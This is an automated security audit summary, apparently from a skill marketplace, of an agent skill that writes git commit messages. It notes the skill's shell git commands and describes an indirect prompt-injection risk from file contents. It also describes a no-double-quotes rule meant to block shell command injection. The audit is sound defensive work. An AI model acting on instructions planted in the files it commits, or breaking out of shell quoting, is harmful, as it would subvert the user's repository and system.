git-commit-message
Pass
Audited by Gen Agent Trust Hub on Mar 8, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill utilizes the
run_commandtool to execute git operations includinggit status,git diff, and a combinedgit add . && git commitcommand. Whilegit add .is a broad operation that stages all changes in the directory, it is aligned with the skill's stated purpose of committing changes. - [PROMPT_INJECTION]: The skill processes untrusted data from local files using
view_fileandgit diffto generate its output. This creates an indirect prompt injection surface where malicious content within the files being committed could attempt to influence the agent's behavior. - [PROMPT_INJECTION]: The skill provides a specific security constraint: "NEVER use double quotes (") in the commit message content". This serves as a manual sanitization measure to prevent the generated text from breaking out of the shell's string delimiters in the
git commit -m "..."command, effectively mitigating simple command injection attacks.
Audit Metadata